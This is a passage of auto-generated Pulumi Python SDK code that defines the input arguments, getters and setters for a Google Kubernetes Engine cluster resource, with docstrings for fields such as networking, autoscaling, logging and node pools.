feature, which provide more control over automatic upgrades of your GKE clusters.
When updating this field, GKE imposes specific version requirements. See
[Selecting a new release channel](https://cloud.google.com/kubernetes-engine/docs/concepts/release-channels#selecting_a_new_release_channel)
for more details; the `container.get_engine_versions` datasource can provide
the default version for a channel. Note that removing the `release_channel`
field from your config will cause the provider to stop managing your cluster's
release channel, but will not unenroll it. Instead, use the `"UNSPECIFIED"`
channel. Structure is documented below.
:param pulumi.Input[bool] remove_default_node_pool: If `true`, deletes the default node
pool upon cluster creation. If you're using `container.NodePool`
resources with no default node pool, this should be set to `true`, alongside
setting `initial_node_count` to at least `1`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] resource_labels: The GCE resource labels (a map of key/value pairs) to be applied to the cluster.
:param pulumi.Input['ClusterResourceUsageExportConfigArgs'] resource_usage_export_config: Configuration for the
[ResourceUsageExportConfig](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-usage-metering) feature.
Structure is documented below.
:param pulumi.Input[str] self_link: The server-defined URL for the resource.
:param pulumi.Input[str] services_ipv4_cidr: The IP address range of the Kubernetes services in this
cluster, in [CIDR](http://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing)
notation (e.g. `1.2.3.4/29`). Service addresses are typically put in the last
`/16` from the container CIDR.
:param pulumi.Input[str] subnetwork: The name or self_link of the Google Compute Engine
subnetwork in which the cluster's instances are launched.
:param pulumi.Input[str] tpu_ipv4_cidr_block: The IP address range of the Cloud TPUs in this cluster, in
[CIDR](http://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing)
notation (e.g. `1.2.3.4/29`).
:param pulumi.Input['ClusterVerticalPodAutoscalingArgs'] vertical_pod_autoscaling: Vertical Pod Autoscaling automatically adjusts the resources of pods controlled by it.
Structure is documented below.
:param pulumi.Input['ClusterWorkloadIdentityConfigArgs'] workload_identity_config: Workload Identity allows Kubernetes service accounts to act as a user-managed
[Google IAM Service Account](https://cloud.google.com/iam/docs/service-accounts#user-managed_service_accounts).
Structure is documented below.
"""
if addons_config is not None:
pulumi.set(__self__, "addons_config", addons_config)
if authenticator_groups_config is not None:
pulumi.set(__self__, "authenticator_groups_config", authenticator_groups_config)
if cluster_autoscaling is not None:
pulumi.set(__self__, "cluster_autoscaling", cluster_autoscaling)
if cluster_ipv4_cidr is not None:
pulumi.set(__self__, "cluster_ipv4_cidr", cluster_ipv4_cidr)
if cluster_telemetry is not None:
pulumi.set(__self__, "cluster_telemetry", cluster_telemetry)
if confidential_nodes is not None:
pulumi.set(__self__, "confidential_nodes", confidential_nodes)
if database_encryption is not None:
pulumi.set(__self__, "database_encryption", database_encryption)
if datapath_provider is not None:
pulumi.set(__self__, "datapath_provider", datapath_provider)
if default_max_pods_per_node is not None:
pulumi.set(__self__, "default_max_pods_per_node", default_max_pods_per_node)
if default_snat_status is not None:
pulumi.set(__self__, "default_snat_status", default_snat_status)
if description is not None:
pulumi.set(__self__, "description", description)
if dns_config is not None:
pulumi.set(__self__, "dns_config", dns_config)
if enable_autopilot is not None:
pulumi.set(__self__, "enable_autopilot", enable_autopilot)
if enable_binary_authorization is not None:
pulumi.set(__self__, "enable_binary_authorization", enable_binary_authorization)
if enable_intranode_visibility is not None:
pulumi.set(__self__, "enable_intranode_visibility", enable_intranode_visibility)
if enable_kubernetes_alpha is not None:
pulumi.set(__self__, "enable_kubernetes_alpha", enable_kubernetes_alpha)
if enable_l4_ilb_subsetting is not None:
pulumi.set(__self__, "enable_l4_ilb_subsetting", enable_l4_ilb_subsetting)
if enable_legacy_abac is not None:
pulumi.set(__self__, "enable_legacy_abac", enable_legacy_abac)
if enable_shielded_nodes is not None:
pulumi.set(__self__, "enable_shielded_nodes", enable_shielded_nodes)
if enable_tpu is not None:
pulumi.set(__self__, "enable_tpu", enable_tpu)
if endpoint is not None:
pulumi.set(__self__, "endpoint", endpoint)
if identity_service_config is not None:
pulumi.set(__self__, "identity_service_config", identity_service_config)
if initial_node_count is not None:
pulumi.set(__self__, "initial_node_count", initial_node_count)
if ip_allocation_policy is not None:
pulumi.set(__self__, "ip_allocation_policy", ip_allocation_policy)
if label_fingerprint is not None:
pulumi.set(__self__, "label_fingerprint", label_fingerprint)
if location is not None:
pulumi.set(__self__, "location", location)
if logging_config is not None:
pulumi.set(__self__, "logging_config", logging_config)
if logging_service is not None:
pulumi.set(__self__, "logging_service", logging_service)
if maintenance_policy is not None:
pulumi.set(__self__, "maintenance_policy", maintenance_policy)
if master_auth is not None:
pulumi.set(__self__, "master_auth", master_auth)
if master_authorized_networks_config is not None:
pulumi.set(__self__, "master_authorized_networks_config", master_authorized_networks_config)
if master_version is not None:
pulumi.set(__self__, "master_version", master_version)
if min_master_version is not None:
pulumi.set(__self__, "min_master_version", min_master_version)
if monitoring_config is not None:
pulumi.set(__self__, "monitoring_config", monitoring_config)
if monitoring_service is not None:
pulumi.set(__self__, "monitoring_service", monitoring_service)
if name is not None:
pulumi.set(__self__, "name", name)
if network is not None:
pulumi.set(__self__, "network", network)
if network_policy is not None:
pulumi.set(__self__, "network_policy", network_policy)
if networking_mode is not None:
pulumi.set(__self__, "networking_mode", networking_mode)
if node_config is not None:
pulumi.set(__self__, "node_config", node_config)
if node_locations is not None:
pulumi.set(__self__, "node_locations", node_locations)
if node_pools is not None:
pulumi.set(__self__, "node_pools", node_pools)
if node_version is not None:
pulumi.set(__self__, "node_version", node_version)
if notification_config is not None:
pulumi.set(__self__, "notification_config", notification_config)
if operation is not None:
pulumi.set(__self__, "operation", operation)
if pod_security_policy_config is not None:
pulumi.set(__self__, "pod_security_policy_config", pod_security_policy_config)
if private_cluster_config is not None:
pulumi.set(__self__, "private_cluster_config", private_cluster_config)
if private_ipv6_google_access is not None:
pulumi.set(__self__, "private_ipv6_google_access", private_ipv6_google_access)
if project is not None:
pulumi.set(__self__, "project", project)
if release_channel is not None:
pulumi.set(__self__, "release_channel", release_channel)
if remove_default_node_pool is not None:
pulumi.set(__self__, "remove_default_node_pool", remove_default_node_pool)
if resource_labels is not None:
pulumi.set(__self__, "resource_labels", resource_labels)
if resource_usage_export_config is not None:
pulumi.set(__self__, "resource_usage_export_config", resource_usage_export_config)
if self_link is not None:
pulumi.set(__self__, "self_link", self_link)
if services_ipv4_cidr is not None:
pulumi.set(__self__, "services_ipv4_cidr", services_ipv4_cidr)
if subnetwork is not None:
pulumi.set(__self__, "subnetwork", subnetwork)
if tpu_ipv4_cidr_block is not None:
pulumi.set(__self__, "tpu_ipv4_cidr_block", tpu_ipv4_cidr_block)
if vertical_pod_autoscaling is not None:
pulumi.set(__self__, "vertical_pod_autoscaling", vertical_pod_autoscaling)
if workload_identity_config is not None:
pulumi.set(__self__, "workload_identity_config", workload_identity_config)
@property
@pulumi.getter(name="addonsConfig")
def addons_config(self) -> Optional[pulumi.Input['ClusterAddonsConfigArgs']]:
"""
The configuration for addons supported by GKE.
Structure is documented below.
"""
return pulumi.get(self, "addons_config")
@addons_config.setter
def addons_config(self, value: Optional[pulumi.Input['ClusterAddonsConfigArgs']]):
pulumi.set(self, "addons_config", value)
@property
@pulumi.getter(name="authenticatorGroupsConfig")
def authenticator_groups_config(self) -> Optional[pulumi.Input['ClusterAuthenticatorGroupsConfigArgs']]:
"""
Configuration for the
[Google Groups for GKE](https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control#groups-setup-gsuite) feature.
Structure is documented below.
"""
return pulumi.get(self, "authenticator_groups_config")
@authenticator_groups_config.setter
def authenticator_groups_config(self, value: Optional[pulumi.Input['ClusterAuthenticatorGroupsConfigArgs']]):
pulumi.set(self, "authenticator_groups_config", value)
@property
@pulumi.getter(name="clusterAutoscaling")
def cluster_autoscaling(self) -> Optional[pulumi.Input['ClusterClusterAutoscalingArgs']]:
"""
Per-cluster configuration of Node Auto-Provisioning with Cluster Autoscaler to
automatically adjust the size of the cluster and create/delete node pools based
on the current needs of the cluster's workload. See the
[guide to using Node Auto-Provisioning](https://cloud.google.com/kubernetes-engine/docs/how-to/node-auto-provisioning)
for more details. Structure is documented below.
"""
return pulumi.get(self, "cluster_autoscaling")
@cluster_autoscaling.setter
def cluster_autoscaling(self, value: Optional[pulumi.Input['ClusterClusterAutoscalingArgs']]):
pulumi.set(self, "cluster_autoscaling", value)
@property
@pulumi.getter(name="clusterIpv4Cidr")
def cluster_ipv4_cidr(self) -> Optional[pulumi.Input[str]]:
"""
The IP address range of the Kubernetes pods
in this cluster in CIDR notation (e.g. `10.96.0.0/14`). Leave blank to have one
automatically chosen or specify a `/14` block in `10.0.0.0/8`. This field will
only work for routes-based clusters, where `ip_allocation_policy` is not defined.
"""
return pulumi.get(self, "cluster_ipv4_cidr")
@cluster_ipv4_cidr.setter
def cluster_ipv4_cidr(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_ipv4_cidr", value)
@property
@pulumi.getter(name="clusterTelemetry")
def cluster_telemetry(self) -> Optional[pulumi.Input['ClusterClusterTelemetryArgs']]:
"""
Configuration for
[ClusterTelemetry](https://cloud.google.com/monitoring/kubernetes-engine/installing#controlling_the_collection_of_application_logs) feature,
Structure is documented below.
"""
return pulumi.get(self, "cluster_telemetry")
@cluster_telemetry.setter
def cluster_telemetry(self, value: Optional[pulumi.Input['ClusterClusterTelemetryArgs']]):
pulumi.set(self, "cluster_telemetry", value)
@property
@pulumi.getter(name="confidentialNodes")
def confidential_nodes(self) -> Optional[pulumi.Input['ClusterConfidentialNodesArgs']]:
"""
Configuration for [Confidential Nodes](https://cloud.google.com/kubernetes-engine/docs/how-to/confidential-gke-nodes) feature. Structure is documented below documented below.
"""
return pulumi.get(self, "confidential_nodes")
@confidential_nodes.setter
def confidential_nodes(self, value: Optional[pulumi.Input['ClusterConfidentialNodesArgs']]):
pulumi.set(self, "confidential_nodes", value)
@property
@pulumi.getter(name="databaseEncryption")
def database_encryption(self) -> Optional[pulumi.Input['ClusterDatabaseEncryptionArgs']]:
"""
Structure is documented below.
"""
return pulumi.get(self, "database_encryption")
@database_encryption.setter
def database_encryption(self, value: Optional[pulumi.Input['ClusterDatabaseEncryptionArgs']]):
pulumi.set(self, "database_encryption", value)
@property
@pulumi.getter(name="datapathProvider")
def datapath_provider(self) -> Optional[pulumi.Input[str]]:
"""
The desired datapath provider for this cluster. By default, uses the IPTables-based kube-proxy implementation.
"""
return pulumi.get(self, "datapath_provider")
@datapath_provider.setter
def datapath_provider(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "datapath_provider", value)
@property
@pulumi.getter(name="defaultMaxPodsPerNode")
def default_max_pods_per_node(self) -> Optional[pulumi.Input[int]]:
"""
The default maximum number of pods
per node in this cluster. This doesn't work on "routes-based" clusters, clusters
that don't have IP Aliasing enabled. See the [official documentation](https://cloud.google.com/kubernetes-engine/docs/how-to/flexible-pod-cidr)
for more information.
"""
return pulumi.get(self, "default_max_pods_per_node")
@default_max_pods_per_node.setter
def default_max_pods_per_node(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "default_max_pods_per_node", value)
@property
@pulumi.getter(name="defaultSnatStatus")
def default_snat_status(self) -> Optional[pulumi.Input['ClusterDefaultSnatStatusArgs']]:
"""
[GKE SNAT](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-masquerade-agent#how_ipmasq_works) DefaultSnatStatus contains the desired state of whether default sNAT should be disabled on the cluster, [API doc](https://cloud.google.com/kubernetes-engine/docs/reference/rest/v1beta1/projects.locations.clusters#networkconfig). Structure is documented below
"""
return pulumi.get(self, "default_snat_status")
@default_snat_status.setter
def default_snat_status(self, value: Optional[pulumi.Input['ClusterDefaultSnatStatusArgs']]):
pulumi.set(self, "default_snat_status", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Description of the cluster.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="dnsConfig")
def dns_config(self) -> Optional[pulumi.Input['ClusterDnsConfigArgs']]:
"""
Configuration for [Using Cloud DNS for GKE](https://cloud.google.com/kubernetes-engine/docs/how-to/cloud-dns). Structure is documented below.
"""
return pulumi.get(self, "dns_config")
@dns_config.setter
def dns_config(self, value: Optional[pulumi.Input['ClusterDnsConfigArgs']]):
pulumi.set(self, "dns_config", value)
@property
@pulumi.getter(name="enableAutopilot")
def enable_autopilot(self) -> Optional[pulumi.Input[bool]]:
"""
Enable Autopilot for this cluster. Defaults to `false`.
Note that when this option is enabled, certain features of Standard GKE are not available.
See the [official documentation](https://cloud.google.com/kubernetes-engine/docs/concepts/autopilot-overview#comparison)
for available features.
"""
return pulumi.get(self, "enable_autopilot")
@enable_autopilot.setter
def enable_autopilot(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_autopilot", value)
@property
@pulumi.getter(name="enableBinaryAuthorization")
def enable_binary_authorization(self) -> Optional[pulumi.Input[bool]]:
"""
Enable Binary Authorization for this cluster.
If enabled, all container images will be validated by Google Binary Authorization.
"""
return pulumi.get(self, "enable_binary_authorization")
@enable_binary_authorization.setter
def enable_binary_authorization(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_binary_authorization", value)
@property
@pulumi.getter(name="enableIntranodeVisibility")
def enable_intranode_visibility(self) -> Optional[pulumi.Input[bool]]:
"""
Whether Intra-node visibility is enabled for this cluster. This makes same node pod to pod traffic visible for VPC network.
"""
return pulumi.get(self, "enable_intranode_visibility")
@enable_intranode_visibility.setter
def enable_intranode_visibility(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_intranode_visibility", value)
@property
@pulumi.getter(name="enableKubernetesAlpha")
def enable_kubernetes_alpha(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to enable Kubernetes Alpha features for
this cluster. Note that when this option is enabled, the cluster cannot be upgraded
and will be automatically deleted after 30 days.
"""
return pulumi.get(self, "enable_kubernetes_alpha")
@enable_kubernetes_alpha.setter
def enable_kubernetes_alpha(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_kubernetes_alpha", value)
@property
@pulumi.getter(name="enableL4IlbSubsetting")
def enable_l4_ilb_subsetting(self) -> Optional[pulumi.Input[bool]]:
"""
Whether L4ILB Subsetting is enabled for this cluster.
"""
return pulumi.get(self, "enable_l4_ilb_subsetting")
@enable_l4_ilb_subsetting.setter
def enable_l4_ilb_subsetting(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_l4_ilb_subsetting", value)
@property
@pulumi.getter(name="enableLegacyAbac")
def enable_legacy_abac(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the ABAC authorizer is enabled for this cluster.
When enabled, identities in the system, including service accounts, nodes, and controllers,
will have statically granted permissions beyond those provided by the RBAC configuration or IAM.
Defaults to `false`
"""
return pulumi.get(self, "enable_legacy_abac")
@enable_legacy_abac.setter
def enable_legacy_abac(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_legacy_abac", value)
@property
@pulumi.getter(name="enableShieldedNodes")
def enable_shielded_nodes(self) -> Optional[pulumi.Input[bool]]:
"""
Enable Shielded Nodes features on all nodes in this cluster. Defaults to `true`.
"""
return pulumi.get(self, "enable_shielded_nodes")
@enable_shielded_nodes.setter
def enable_shielded_nodes(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_shielded_nodes", value)
@property
@pulumi.getter(name="enableTpu")
def enable_tpu(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to enable Cloud TPU resources in this cluster.
See the [official documentation](https://cloud.google.com/tpu/docs/kubernetes-engine-setup).
"""
return pulumi.get(self, "enable_tpu")
@enable_tpu.setter
def enable_tpu(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_tpu", value)
@property
@pulumi.getter
def endpoint(self) -> Optional[pulumi.Input[str]]:
"""
The IP address of this cluster's Kubernetes master.
"""
return pulumi.get(self, "endpoint")
@endpoint.setter
def endpoint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "endpoint", value)
@property
@pulumi.getter(name="identityServiceConfig")
def identity_service_config(self) -> Optional[pulumi.Input['ClusterIdentityServiceConfigArgs']]:
"""
. Structure is documented below.
"""
return pulumi.get(self, "identity_service_config")
@identity_service_config.setter
def identity_service_config(self, value: Optional[pulumi.Input['ClusterIdentityServiceConfigArgs']]):
pulumi.set(self, "identity_service_config", value)
@property
@pulumi.getter(name="initialNodeCount")
def initial_node_count(self) -> Optional[pulumi.Input[int]]:
"""
The number of nodes to create in this
cluster's default node pool. In regional or multi-zonal clusters, this is the
number of nodes per zone. Must be set if `node_pool` is not set. If you're using
`container.NodePool` objects with no default node pool, you'll need to
set this to a value of at least `1`, alongside setting
`remove_default_node_pool` to `true`.
"""
return pulumi.get(self, "initial_node_count")
@initial_node_count.setter
def initial_node_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "initial_node_count", value)
@property
@pulumi.getter(name="ipAllocationPolicy")
def ip_allocation_policy(self) -> Optional[pulumi.Input['ClusterIpAllocationPolicyArgs']]:
"""
Configuration of cluster IP allocation for
VPC-native clusters. Adding this block enables [IP aliasing](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-aliases),
making the cluster VPC-native instead of routes-based. Structure is documented
below.
"""
return pulumi.get(self, "ip_allocation_policy")
@ip_allocation_policy.setter
def ip_allocation_policy(self, value: Optional[pulumi.Input['ClusterIpAllocationPolicyArgs']]):
pulumi.set(self, "ip_allocation_policy", value)
@property
@pulumi.getter(name="labelFingerprint")
def label_fingerprint(self) -> Optional[pulumi.Input[str]]:
"""
The fingerprint of the set of labels for this cluster.
"""
return pulumi.get(self, "label_fingerprint")
@label_fingerprint.setter
def label_fingerprint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "label_fingerprint", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The location (region or zone) in which the cluster
master will be created, as well as the default node location. If you specify a
zone (such as `us-central1-a`), the cluster will be a zonal cluster with a
single cluster master. If you specify a region (such as `us-west1`), the
cluster will be a regional cluster with multiple masters spread across zones in
the region, and with default node locations in those zones as well
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="loggingConfig")
def logging_config(self) -> Optional[pulumi.Input['ClusterLoggingConfigArgs']]:
"""
Logging configuration for the cluster.
Structure is documented below.
"""
return pulumi.get(self, "logging_config")
@logging_config.setter
def logging_config(self, value: Optional[pulumi.Input['ClusterLoggingConfigArgs']]):
pulumi.set(self, "logging_config", value)
@property
@pulumi.getter(name="loggingService")
def logging_service(self) -> Optional[pulumi.Input[str]]:
"""
The logging service that the cluster should
write logs to. Available options include `logging.googleapis.com`(Legacy Stackdriver),
`logging.googleapis.com/kubernetes`(Stackdriver Kubernetes Engine Logging), and `none`. Defaults to `logging.googleapis.com/kubernetes`
"""
return pulumi.get(self, "logging_service")
@logging_service.setter
def logging_service(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "logging_service", value)
@property
@pulumi.getter(name="maintenancePolicy")
def maintenance_policy(self) -> Optional[pulumi.Input['ClusterMaintenancePolicyArgs']]:
"""
The maintenance policy to use for the cluster. Structure is
documented below.
"""
return pulumi.get(self, "maintenance_policy")
@maintenance_policy.setter
def maintenance_policy(self, value: Optional[pulumi.Input['ClusterMaintenancePolicyArgs']]):
pulumi.set(self, "maintenance_policy", value)
@property
@pulumi.getter(name="masterAuth")
def master_auth(self) -> Optional[pulumi.Input['ClusterMasterAuthArgs']]:
"""
The authentication information for accessing the
Kubernetes master. Some values in this block are only returned by the API if
your service account has permission to get credentials for your GKE cluster. If
you see an unexpected diff unsetting your client cert, ensure you have the
`container.clusters.getCredentials` permission.
Structure is documented below.
"""
return pulumi.get(self, "master_auth")
@master_auth.setter
def master_auth(self, value: Optional[pulumi.Input['ClusterMasterAuthArgs']]):
pulumi.set(self, "master_auth", value)
@property
@pulumi.getter(name="masterAuthorizedNetworksConfig")
def master_authorized_networks_config(self) -> Optional[pulumi.Input['ClusterMasterAuthorizedNetworksConfigArgs']]:
"""
The desired
configuration options for master authorized networks. Omit the
nested `cidr_blocks` attribute to disallow external access (except
the cluster node IPs, which GKE automatically whitelists).
Structure is documented below.
"""
return pulumi.get(self, "master_authorized_networks_config")
@master_authorized_networks_config.setter
def master_authorized_networks_config(self, value: Optional[pulumi.Input['ClusterMasterAuthorizedNetworksConfigArgs']]):
pulumi.set(self, "master_authorized_networks_config", value)
@property
@pulumi.getter(name="masterVersion")
def master_version(self) -> Optional[pulumi.Input[str]]:
"""
The current version of the master in the cluster. This may
be different than the `min_master_version` set in the config if the master
has been updated by GKE.
"""
return pulumi.get(self, "master_version")
@master_version.setter
def master_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "master_version", value)
@property
@pulumi.getter(name="minMasterVersion")
def min_master_version(self) -> Optional[pulumi.Input[str]]:
"""
The minimum version of the master. GKE
will auto-update the master to new versions, so this does not guarantee the
current master version--use the read-only `master_version` field to obtain that.
If unset, the cluster's version will be set by GKE to the version of the most recent
official release (which is not necessarily the latest version). Most users will find
the `container.get_engine_versions` data source useful - it indicates which versions
are available. If you intend to specify versions manually,
[the docs](https://cloud.google.com/kubernetes-engine/versioning-and-upgrades#specifying_cluster_version)
describe the various acceptable formats for this field.
"""
return pulumi.get(self, "min_master_version")
@min_master_version.setter
def min_master_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "min_master_version", value)
@property
@pulumi.getter(name="monitoringConfig")
def monitoring_config(self) -> Optional[pulumi.Input['ClusterMonitoringConfigArgs']]:
"""
Monitoring configuration for the cluster.
Structure is documented below.
"""
return pulumi.get(self, "monitoring_config")
@monitoring_config.setter
def monitoring_config(self, value: Optional[pulumi.Input['ClusterMonitoringConfigArgs']]):
pulumi.set(self, "monitoring_config", value)
@property
@pulumi.getter(name="monitoringService")
def monitoring_service(self) -> Optional[pulumi.Input[str]]:
"""
The monitoring service that the cluster
should write metrics to.
Automatically send metrics from pods in the cluster to the Google Cloud Monitoring API.
VM metrics will be collected by Google Compute Engine regardless of this setting
Available options include
`monitoring.googleapis.com`(Legacy Stackdriver), `monitoring.googleapis.com/kubernetes`(Stackdriver Kubernetes Engine Monitoring), and `none`.
Defaults to `monitoring.googleapis.com/kubernetes`
"""
return pulumi.get(self, "monitoring_service")
@monitoring_service.setter
def monitoring_service(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "monitoring_service", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the cluster, unique within the project and
location.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def network(self) -> Optional[pulumi.Input[str]]:
"""
The name or self_link of the Google Compute Engine
network to which the cluster is connected. For Shared VPC, set this to the self link of the
shared network.
"""
return pulumi.get(self, "network")
@network.setter
def network(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "network", value)
@property
@pulumi.getter(name="networkPolicy")
def network_policy(self) -> Optional[pulumi.Input['ClusterNetworkPolicyArgs']]:
"""
Configuration options for the
[NetworkPolicy](https://kubernetes.io/docs/concepts/services-networking/networkpolicies/)
feature. Structure is documented below.
"""
return pulumi.get(self, "network_policy")
@network_policy.setter
def network_policy(self, value: Optional[pulumi.Input['ClusterNetworkPolicyArgs']]):
pulumi.set(self, "network_policy", value)
@property
@pulumi.getter(name="networkingMode")
def networking_mode(self) -> Optional[pulumi.Input[str]]:
"""
Determines whether alias IPs or routes will be used for pod IPs in the cluster.
Options are `VPC_NATIVE` or `ROUTES`. `VPC_NATIVE` enables [IP aliasing](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-aliases),
and requires the `ip_allocation_policy` block to be defined. By default when this field is unspecified, GKE will create a `ROUTES`-based cluster.
"""
return pulumi.get(self, "networking_mode")
@networking_mode.setter
def networking_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "networking_mode", value)
@property
@pulumi.getter(name="nodeConfig")
def node_config(self) -> Optional[pulumi.Input['ClusterNodeConfigArgs']]:
"""
Parameters used in creating the default node pool.
Generally, this field should not be used at the same time as a
`container.NodePool` or a `node_pool` block; this configuration
manages the default node pool, which isn't recommended to be used.
Structure is documented below.
"""
return pulumi.get(self, "node_config")
@node_config.setter
def node_config(self, value: Optional[pulumi.Input['ClusterNodeConfigArgs']]):
pulumi.set(self, "node_config", value)
@property
@pulumi.getter(name="nodeLocations")
def node_locations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The list of zones in which the cluster's nodes
are located. Nodes must be in the region of their regional cluster or in the
same region as their cluster's zone for zonal clusters. If this is specified for
a zonal cluster, omit the cluster's zone.
"""
return pulumi.get(self, "node_locations")
@node_locations.setter
def node_locations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "node_locations", value)
@property
@pulumi.getter(name="nodePools")
def node_pools(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ClusterNodePoolArgs']]]]:
"""
List of node pools associated with this cluster.
See container.NodePool for schema.
**Warning:** node pools defined inside a cluster can't be changed (or added/removed) after
cluster creation without deleting and recreating the entire cluster. Unless you absolutely need the ability
to say "these are the _only_ node pools associated with this cluster", use the
container.NodePool resource instead of this property.
"""
return pulumi.get(self, "node_pools")
@node_pools.setter
def node_pools(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ClusterNodePoolArgs']]]]):
pulumi.set(self, "node_pools", value)
@property
@pulumi.getter(name="nodeVersion")
def node_version(self) -> Optional[pulumi.Input[str]]:
"""
The Kubernetes version on the nodes. Must either be unset
or set to the same value as `min_master_version` on create. Defaults to the default
version set by GKE which is not necessarily the latest version. This only affects
nodes in the default node pool. While a fuzzy version can be specified, it's
recommended that you specify explicit versions as the provider will see spurious diffs
when fuzzy versions are used. See the `container.get_engine_versions` data source's
`version_prefix` field to approximate fuzzy versions.
To update nodes in other node pools, use the `version` attribute on the node pool.
"""
return pulumi.get(self, "node_version")
@node_version.setter
def node_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "node_version", value)
@property
@pulumi.getter(name="notificationConfig")
def notification_config(self) -> Optional[pulumi.Input['ClusterNotificationConfigArgs']]:
"""
Configuration for the [cluster upgrade notifications](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-upgrade-notifications) feature. Structure is documented below.
"""
return pulumi.get(self, "notification_config")
@notification_config.setter
def notification_config(self, value: Optional[pulumi.Input['ClusterNotificationConfigArgs']]):
pulumi.set(self, "notification_config", value)
@property
@pulumi.getter
def operation(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "operation")
@operation.setter
def operation(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "operation", value)
@property
@pulumi.getter(name="podSecurityPolicyConfig")
def pod_security_policy_config(self) -> Optional[pulumi.Input['ClusterPodSecurityPolicyConfigArgs']]:
"""
) Configuration for the
[PodSecurityPolicy](https://cloud.google.com/kubernetes-engine/docs/how-to/pod-security-policies) feature.
Structure is documented below.
"""
return pulumi.get(self, "pod_security_policy_config")
@pod_security_policy_config.setter
def pod_security_policy_config(self, value: Optional[pulumi.Input['ClusterPodSecurityPolicyConfigArgs']]):
pulumi.set(self, "pod_security_policy_config", value)
@property
@pulumi.getter(name="privateClusterConfig")
def private_cluster_config(self) -> Optional[pulumi.Input['ClusterPrivateClusterConfigArgs']]:
"""
Configuration for [private clusters](https://cloud.google.com/kubernetes-engine/docs/how-to/private-clusters),
clusters with private nodes. Structure is documented below.
"""
return pulumi.get(self, "private_cluster_config")
@private_cluster_config.setter
def private_cluster_config(self, value: Optional[pulumi.Input['ClusterPrivateClusterConfigArgs']]):
pulumi.set(self, "private_cluster_config", value)
@property
@pulumi.getter(name="privateIpv6GoogleAccess")
def private_ipv6_google_access(self) -> Optional[pulumi.Input[str]]:
"""
The desired state of IPv6 connectivity to Google Services. By default, no private IPv6 access to or from Google Services (all access will be via IPv4).
"""
return pulumi.get(self, "private_ipv6_google_access")
@private_ipv6_google_access.setter
def private_ipv6_google_access(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_ipv6_google_access", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs. If it
is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter(name="releaseChannel")
def release_channel(self) -> Optional[pulumi.Input['ClusterReleaseChannelArgs']]:
"""
Configuration options for the [Release channel](https://cloud.google.com/kubernetes-engine/docs/concepts/release-channels)
feature, which provide more control over automatic upgrades of your GKE clusters.
When updating this field, GKE imposes specific version requirements. See
[Selecting a new release channel](https://cloud.google.com/kubernetes-engine/docs/concepts/release-channels#selecting_a_new_release_channel)
for more details; the `container.get_engine_versions` datasource can provide
the default version for a channel. Note that removing the `release_channel`
field from your config will cause the provider to stop managing your cluster's
release channel, but will not unenroll it. Instead, use the `"UNSPECIFIED"`
channel. Structure is documented below.
"""
return pulumi.get(self, "release_channel")
@release_channel.setter
def release_channel(self, value: Optional[pulumi.Input['ClusterReleaseChannelArgs']]):
pulumi.set(self, "release_channel", value)
@property
@pulumi.getter(name="removeDefaultNodePool")
def remove_default_node_pool(self) -> Optional[pulumi.Input[bool]]:
"""
If `true`, deletes the default node
pool upon cluster creation. If you're using `container.NodePool`
resources with no default node pool, this should be set to `true`, alongside
setting `initial_node_count` to at least `1`.
"""
return pulumi.get(self, "remove_default_node_pool")
@remove_default_node_pool.setter
def remove_default_node_pool(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "remove_default_node_pool", value)
